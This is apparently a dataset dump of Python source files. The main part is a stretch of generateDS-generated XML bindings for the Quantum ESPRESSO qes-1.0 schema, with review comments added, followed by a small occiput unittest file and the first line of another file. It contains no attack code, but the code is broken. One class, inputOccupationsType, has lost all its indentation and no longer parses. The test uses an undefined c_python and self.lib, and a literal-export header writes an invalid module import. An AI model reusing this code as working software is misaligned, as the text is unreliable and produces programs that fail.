            # Schema type is positiveInteger: reject zero and negatives.
            if self.rank <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        # NOTE(review): dims is stored as the raw attribute string here,
        # not parsed to integers -- confirm against the qes schema if
        # consuming it numerically.
        value = find_attr_value_('dims', node)
        if value is not None and 'dims' not in already_processed:
            already_processed.add('dims')
            self.dims = value
        value = find_attr_value_('order', node)
        if value is not None and 'order' not in already_processed:
            already_processed.add('order')
            self.order = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class integerMatrixType
class scalarQuantityType(GeneratedsSuper):
    """Binding for a scalar-quantity element: text content (the value)
    with a ``Units`` string attribute.

    NOTE(review): appears to be generateDS-generated qes-1.0 binding code;
    prefer regenerating from the schema over hand edits.
    """
    subclass = None
    superclass = None
    def __init__(self, Units=None, valueOf_=None):
        self.original_tagname_ = None
        # Units is kept as a raw attribute string (no cast applied).
        self.Units = _cast(None, Units)
        # valueOf_ holds the element's text content.
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Constructor indirection: registered/hooked subclasses win over
        # this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, scalarQuantityType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if scalarQuantityType.subclass:
            return scalarQuantityType.subclass(*args_, **kwargs_)
        else:
            return scalarQuantityType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_Units(self): return self.Units
    def set_Units(self, Units): self.Units = Units
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric 0/0.0 still counts as content (the `1 if ...` guard).
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='scalarQuantityType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('scalarQuantityType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='scalarQuantityType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='scalarQuantityType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='scalarQuantityType'):
        if self.Units is not None and 'Units' not in already_processed:
            already_processed.add('Units')
            outfile.write(' Units=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Units), input_name='Units')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='scalarQuantityType', fromsubclass_=False, pretty_print=True):
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('Units', node)
        if value is not None and 'Units' not in already_processed:
            already_processed.add('Units')
            self.Units = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class scalarQuantityType
class equivalent_atomsType(integerVectorType):
    """integerVectorType specialization adding a ``nat`` (positive
    integer, number of atoms) attribute.

    NOTE(review): appears to be generateDS-generated qes-1.0 binding code;
    prefer regenerating from the schema over hand edits.
    """
    subclass = None
    superclass = integerVectorType
    def __init__(self, size=None, nat=None, valueOf_=None):
        self.original_tagname_ = None
        # extensiontype_ is not forwarded to the base -- it defaults to
        # None there.
        super(equivalent_atomsType, self).__init__(size, valueOf_, )
        self.nat = _cast(int, nat)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Constructor indirection: registered/hooked subclasses win over
        # this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, equivalent_atomsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if equivalent_atomsType.subclass:
            return equivalent_atomsType.subclass(*args_, **kwargs_)
        else:
            return equivalent_atomsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_nat(self): return self.nat
    def set_nat(self, nat): self.nat = nat
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric 0/0.0 still counts as content; also defer to the base
        # class check.
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_) or
            super(equivalent_atomsType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='equivalent_atomsType', namespacedef_='', pretty_print=True):
        """Write this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('equivalent_atomsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='equivalent_atomsType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='equivalent_atomsType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='equivalent_atomsType'):
        # Base class writes `size` (and xsi:type, if set) first.
        super(equivalent_atomsType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='equivalent_atomsType')
        if self.nat is not None and 'nat' not in already_processed:
            already_processed.add('nat')
            outfile.write(' nat="%s"' % self.gds_format_integer(self.nat, input_name='nat'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='equivalent_atomsType', fromsubclass_=False, pretty_print=True):
        super(equivalent_atomsType, self).exportChildren(outfile, level, namespaceprefix_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('nat', node)
        if value is not None and 'nat' not in already_processed:
            already_processed.add('nat')
            try:
                self.nat = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            # Schema type is positiveInteger: reject zero and negatives.
            if self.nat <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        # Let the base class pick up `size` and xsi:type.
        super(equivalent_atomsType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class equivalent_atomsType
class inputOccupationsType(vectorType):
subclass = None
superclass = vectorType
def __init__(self, size=None, ispin=None, spin_factor=None, valueOf_=None):
self.original_tagname_ = None
super(inputOccupationsType, self).__init__(size, valueOf_, )
self.ispin = _cast(int, ispin)
self.spin_factor = _cast(float, spin_factor)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, inputOccupationsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if inputOccupationsType.subclass:
return inputOccupationsType.subclass(*args_, **kwargs_)
else:
return inputOccupationsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ispin(self): return self.ispin
def set_ispin(self, ispin): self.ispin = ispin
def get_spin_factor(self): return self.spin_factor
def set_spin_factor(self, spin_factor): self.spin_factor = spin_factor
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_) or
super(inputOccupationsType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='inputOccupationsType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('inputOccupationsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='inputOccupationsType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='inputOccupationsType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='inputOccupationsType'):
        # Write inherited attributes first, then this type's `ispin` and
        # `spin_factor`; `already_processed` prevents duplicate emission.
        super(inputOccupationsType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='inputOccupationsType')
        if self.ispin is not None and 'ispin' not in already_processed:
            already_processed.add('ispin')
            outfile.write(' ispin="%s"' % self.gds_format_integer(self.ispin, input_name='ispin'))
        if self.spin_factor is not None and 'spin_factor' not in already_processed:
            already_processed.add('spin_factor')
            outfile.write(' spin_factor="%s"' % self.gds_format_double(self.spin_factor, input_name='spin_factor'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='inputOccupationsType', fromsubclass_=False, pretty_print=True):
        # This type declares no child elements of its own; delegate to the base.
        super(inputOccupationsType, self).exportChildren(outfile, level, namespaceprefix_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        # Populate this object from an already-parsed XML element:
        # attributes first, then text content, then child elements.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Parse `ispin` (schema positiveInteger) and `spin_factor` (double)
        # from the element's attributes, then let the base class handle its own.
        value = find_attr_value_('ispin', node)
        if value is not None and 'ispin' not in already_processed:
            already_processed.add('ispin')
            try:
                self.ispin = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.ispin <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('spin_factor', node)
        if value is not None and 'spin_factor' not in already_processed:
            already_processed.add('spin_factor')
            try:
                self.spin_factor = float(value)
            except ValueError as exp:
                # Generated float handling raises a plain ValueError rather
                # than going through raise_parse_error like the int path.
                raise ValueError('Bad float/double attribute (spin_factor): %s' % exp)
        super(inputOccupationsType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No child elements are defined for this type.
        pass
# end class inputOccupationsType
class Hubbard_nsType(matrixType):
    """Generated binding for the qes ``Hubbard_ns`` matrix element.

    Extends matrixType with the XML attributes ``specie``, ``label``
    (strings), ``spin`` and ``index`` (positive integers).
    """
    subclass = None
    superclass = matrixType
    def __init__(self, rank=None, dims=None, order=None, specie=None, label=None, spin=None, index=None, valueOf_=None):
        self.original_tagname_ = None
        super(Hubbard_nsType, self).__init__(rank, dims, order, valueOf_, )
        self.specie = _cast(None, specie)
        self.label = _cast(None, label)
        self.spin = _cast(int, spin)
        self.index = _cast(int, index)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Prefer a user subclass (module override, then the `subclass` hook).
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, Hubbard_nsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if Hubbard_nsType.subclass:
            return Hubbard_nsType.subclass(*args_, **kwargs_)
        else:
            return Hubbard_nsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor pairs for attributes and text content.
    def get_specie(self): return self.specie
    def set_specie(self, specie): self.specie = specie
    def get_label(self): return self.label
    def set_label(self, label): self.label = label
    def get_spin(self): return self.spin
    def set_spin(self, spin): self.spin = spin
    def get_index(self): return self.index
    def set_index(self, index): self.index = index
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric zero still counts as content, hence the int/float case.
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_) or
            super(Hubbard_nsType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='Hubbard_nsType', namespacedef_='', pretty_print=True):
        # Serialize this element as XML to `outfile`, indented to `level`.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('Hubbard_nsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='Hubbard_nsType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='Hubbard_nsType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='Hubbard_nsType'):
        # Inherited attributes first, then this type's own four.
        super(Hubbard_nsType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='Hubbard_nsType')
        if self.specie is not None and 'specie' not in already_processed:
            already_processed.add('specie')
            outfile.write(' specie=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.specie), input_name='specie')), ))
        if self.label is not None and 'label' not in already_processed:
            already_processed.add('label')
            outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
        if self.spin is not None and 'spin' not in already_processed:
            already_processed.add('spin')
            outfile.write(' spin="%s"' % self.gds_format_integer(self.spin, input_name='spin'))
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='Hubbard_nsType', fromsubclass_=False, pretty_print=True):
        # No child elements of its own; delegate to the base class.
        super(Hubbard_nsType, self).exportChildren(outfile, level, namespaceprefix_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        # Populate from a parsed XML element: attributes, text, children.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # `spin` and `index` are schema positiveIntegers; reject <= 0.
        value = find_attr_value_('specie', node)
        if value is not None and 'specie' not in already_processed:
            already_processed.add('specie')
            self.specie = value
        value = find_attr_value_('label', node)
        if value is not None and 'label' not in already_processed:
            already_processed.add('label')
            self.label = value
        value = find_attr_value_('spin', node)
        if value is not None and 'spin' not in already_processed:
            already_processed.add('spin')
            try:
                self.spin = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.spin <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            try:
                self.index = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.index <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        super(Hubbard_nsType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No child elements are defined for this type.
        pass
# end class Hubbard_nsType
class starting_nsType(vectorType):
    """Generated binding for the qes ``starting_ns`` vector element.

    Extends vectorType with the XML attributes ``specie``, ``label``
    (strings) and ``spin`` (positive integer).
    """
    subclass = None
    superclass = vectorType
    def __init__(self, size=None, specie=None, label=None, spin=None, valueOf_=None):
        self.original_tagname_ = None
        super(starting_nsType, self).__init__(size, valueOf_, )
        self.specie = _cast(None, specie)
        self.label = _cast(None, label)
        self.spin = _cast(int, spin)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Prefer a user subclass (module override, then the `subclass` hook).
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, starting_nsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if starting_nsType.subclass:
            return starting_nsType.subclass(*args_, **kwargs_)
        else:
            return starting_nsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor pairs for attributes and text content.
    def get_specie(self): return self.specie
    def set_specie(self, specie): self.specie = specie
    def get_label(self): return self.label
    def set_label(self, label): self.label = label
    def get_spin(self): return self.spin
    def set_spin(self, spin): self.spin = spin
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Numeric zero still counts as content, hence the int/float case.
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_) or
            super(starting_nsType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='starting_nsType', namespacedef_='', pretty_print=True):
        # Serialize this element as XML to `outfile`, indented to `level`.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('starting_nsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='starting_nsType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='starting_nsType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='starting_nsType'):
        # Inherited attributes first, then this type's own three.
        super(starting_nsType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='starting_nsType')
        if self.specie is not None and 'specie' not in already_processed:
            already_processed.add('specie')
            outfile.write(' specie=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.specie), input_name='specie')), ))
        if self.label is not None and 'label' not in already_processed:
            already_processed.add('label')
            outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
        if self.spin is not None and 'spin' not in already_processed:
            already_processed.add('spin')
            outfile.write(' spin="%s"' % self.gds_format_integer(self.spin, input_name='spin'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='starting_nsType', fromsubclass_=False, pretty_print=True):
        # No child elements of its own; delegate to the base class.
        super(starting_nsType, self).exportChildren(outfile, level, namespaceprefix_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        # Populate from a parsed XML element: attributes, text, children.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # `spin` is a schema positiveInteger; reject <= 0.
        value = find_attr_value_('specie', node)
        if value is not None and 'specie' not in already_processed:
            already_processed.add('specie')
            self.specie = value
        value = find_attr_value_('label', node)
        if value is not None and 'label' not in already_processed:
            already_processed.add('label')
            self.label = value
        value = find_attr_value_('spin', node)
        if value is not None and 'spin' not in already_processed:
            already_processed.add('spin')
            try:
                self.spin = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.spin <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        super(starting_nsType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No child elements are defined for this type.
        pass
# end class starting_nsType
# Maps recognized XML root-element tags to their generated parser classes.
GDSClassesMapping = {
    'espresso': espressoType,
}
# Command-line help text shown when the module is run with bad arguments.
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
    # Print CLI usage and abort with a non-zero exit status.
    print(USAGE_TEXT)
    sys.exit(1)
def get_root_tag(node):
    """Strip the namespace from *node*'s tag and resolve its parser class.

    Returns a ``(tag, cls)`` pair; ``cls`` is looked up first in
    GDSClassesMapping and then among this module's globals, and may be
    None when the tag is unknown.
    """
    tag = Tag_pattern_.match(node.tag).groups()[-1]
    cls = GDSClassesMapping.get(tag)
    if cls is None:
        cls = globals().get(tag)
    return tag, cls
def parse(inFileName, silence=False):
    # Parse *inFileName* into an object tree (falling back to espressoType
    # when the root tag is unknown) and, unless *silence* is set, echo the
    # tree back to stdout as pretty-printed XML.  Returns the root object.
    parser = None
    doc = parsexml_(inFileName, parser)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        rootTag = 'espressoType'
        rootClass = espressoType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        rootObj.export(
            sys.stdout, 0, name_=rootTag,
            namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"',
            pretty_print=True)
    return rootObj
def parseEtree(inFileName, silence=False):
    """Parse *inFileName* and return (rootObj, rootElement, mapping, reverse_mapping).

    rootObj is the generated object tree, rootElement its etree export;
    mapping / reverse_mapping relate generated objects to etree nodes.
    Unless *silence* is set, the pretty-printed XML is echoed to stdout.
    """
    parser = None
    doc = parsexml_(inFileName, parser)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root tag: fall back to the schema's top-level element.
        rootTag = 'espressoType'
        rootClass = espressoType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    mapping = {}
    rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
    reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
    if not silence:
        content = etree_.tostring(
            rootElement, pretty_print=True,
            xml_declaration=True, encoding="utf-8")
        # tostring() with an explicit encoding returns bytes; decode before
        # writing so this does not raise TypeError on Python 3's text stdout.
        if isinstance(content, bytes):
            content = content.decode("utf-8")
        sys.stdout.write(content)
        sys.stdout.write('\n')
    return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False):
    '''Parse a string, create the object tree, and export it.
    Arguments:
    - inString -- A string.  This XML fragment should not start
      with an XML declaration containing an encoding.
    - silence -- A boolean.  If False, export the object.
    Returns -- The root object in the tree.
    '''
    parser = None
    rootNode= parsexmlstring_(inString, parser)
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root tag: fall back to the schema's top-level element.
        rootTag = 'espressoType'
        rootClass = espressoType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        rootObj.export(
            sys.stdout, 0, name_=rootTag,
            namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"')
    return rootObj
def parseLiteral(inFileName, silence=False):
    # Parse *inFileName* and, unless silenced, dump the tree as a Python
    # literal (a model_.rootClass(...) constructor expression) to stdout.
    parser = None
    doc = parsexml_(inFileName, parser)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        rootTag = 'espressoType'
        rootClass = espressoType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    if not silence:
        # NOTE(review): 'import qes-1.0' in the emitted header is not a
        # valid Python module name -- confirm the intended module name.
        sys.stdout.write('#from qes-1.0 import *\n\n')
        sys.stdout.write('import qes-1.0 as model_\n\n')
        sys.stdout.write('rootObj = model_.rootClass(\n')
        rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
        sys.stdout.write(')\n')
    return rootObj
def main():
    """Entry point: parse the single XML file named on the command line."""
    argv = sys.argv[1:]
    if len(argv) != 1:
        usage()
    else:
        parse(argv[0])
# Allow the generated parser module to be run directly as a script.
if __name__ == '__main__':
    #import pdb; pdb.set_trace()
    main()
__all__ = [
"BerryPhaseOutputType",
"HubbardCommonType",
"HubbardJType",
"Hubbard_nsType",
"algorithmic_infoType",
"atomType",
"atomic_constraintType",
"atomic_constraintsType",
"atomic_positionsType",
"atomic_speciesType",
"atomic_structureType",
"band_structureType",
"bandsType",
"basisSetItemType",
"basisType",
"basis_setType",
"bfgsType",
"boundary_conditionsType",
"cellType",
"cell_controlType",
"closedType",
"control_variablesType",
"convergence_infoType",
"createdType",
"creatorType",
"dftType",
"dftUType",
"dipoleOutputType",
"ekin_functionalType",
"electric_fieldType",
"electron_controlType",
"electronicPolarizationType",
"equivalent_atomsType",
"esmType",
"espressoType",
"finiteFieldOutType",
"gateInfoType",
"gate_settingsType",
"general_infoType",
"hybridType",
"infoType",
"inputOccupationsType",
"inputType",
"integerMatrixType",
"integerVectorType",
"ion_controlType",
"ionicPolarizationType",
"k_pointType",
"k_points_IBZType",
"ks_energiesType",
"magnetizationType",
"matrixType",
"mdType",
"monkhorst_packType",
"occupationsType",
"opt_convType",
"outputElectricFieldType",
"outputPBCType",
"outputType",
"parallel_infoType",
"phaseType",
"polarizationType",
"qpoint_gridType",
"reciprocal_latticeType",
"scalarQuantityType",
"scf_convType",
"smearingType",
"speciesType",
"spinType",
"spin_constraintsType",
"starting_nsType",
"stepType",
"symmetriesType",
"symmetryType",
"symmetry_flagsType",
"total_energyType",
"vdWType",
"vectorType",
"wyckoff_positionsType",
"xml_formatType"
]
| 48.526131 | 436 | 0.634352 |
ff59b98ccd11d8990bcfc98c836d616f99646737 | 809 | py | Python | tomolab/Tests/test_all.py | TomographyLab/TomoLab | 86b9a5894ef1660d7f4de39f560f1f92024b40f8 | [
"Apache-2.0"
] | 5 | 2019-06-01T13:16:00.000Z | 2022-03-02T10:21:59.000Z | tomolab/Tests/test_all.py | TomographyLab/TomoLab | 86b9a5894ef1660d7f4de39f560f1f92024b40f8 | [
"Apache-2.0"
] | null | null | null | tomolab/Tests/test_all.py | TomographyLab/TomoLab | 86b9a5894ef1660d7f4de39f560f1f92024b40f8 | [
"Apache-2.0"
] | 1 | 2019-06-01T13:19:18.000Z | 2019-06-01T13:19:18.000Z | # -*- coding: utf-8 -*-
# occiput
# Harvard University, Martinos Center for Biomedical Imaging
# Aalto University, Department of Computer Science
from .. import occiput
import unittest
class Test_Reconstruction_PET(unittest.TestCase):
    """Sequence of tests for tomographic reconstruction - Positron Emission Tomography."""
    def setUp(self):
        # No shared fixtures are created here.
        # NOTE(review): test_projection_wrapper reads self.lib, which is
        # never assigned in this class -- running it raises AttributeError.
        pass
    def test_projection_wrapper(self):
        """Test the Python wrapper for the projection algorithm. """
        number = 0.1
        # Descriptor for an echo-style C call: one input, one output slot.
        # NOTE(review): value 0.1 is declared with type "int" -- confirm
        # whether the descriptor type should be "float".
        descriptor = [
            {"name": "input", "type": "int", "value": number},
            {"name": "output", "type": "int", "value": None},
        ]
        # NOTE(review): c_python is not imported in this module, so this
        # line raises NameError when the test runs -- an import is missing.
        r = c_python.call_c_function(self.lib.echo, descriptor)
        self.assertTrue(r.output == number)
# Run the test suite when this file is executed directly.
if __name__ == "__main__":
    unittest.main()
| 27.896552 | 90 | 0.640297 |
ee9e9872b84d1db23a951009afe2f34b8d7ed213 | 2,021 | py | Python | core_api/core_api/cli_entrypoint.py | ldss-hse/ldss-core-api | c0d9b1c8802a82acc8892bd397961b8d651d4c25 | [
"MIT"
] | null | null | null | core_api/core_api/cli_entrypoint.py | ldss-hse/ldss-core-api | c0d9b1c8802a82acc8892bd397961b8d651d4c25 | [
"MIT"
] | null | null | null | core_api/core_api/cli_entrypoint.py | ldss-hse/ldss-core-api | c0d9b1c8802a82acc8892bd397961b8d651d4c25 | [
"MIT"
] | null | null | null | import argparse
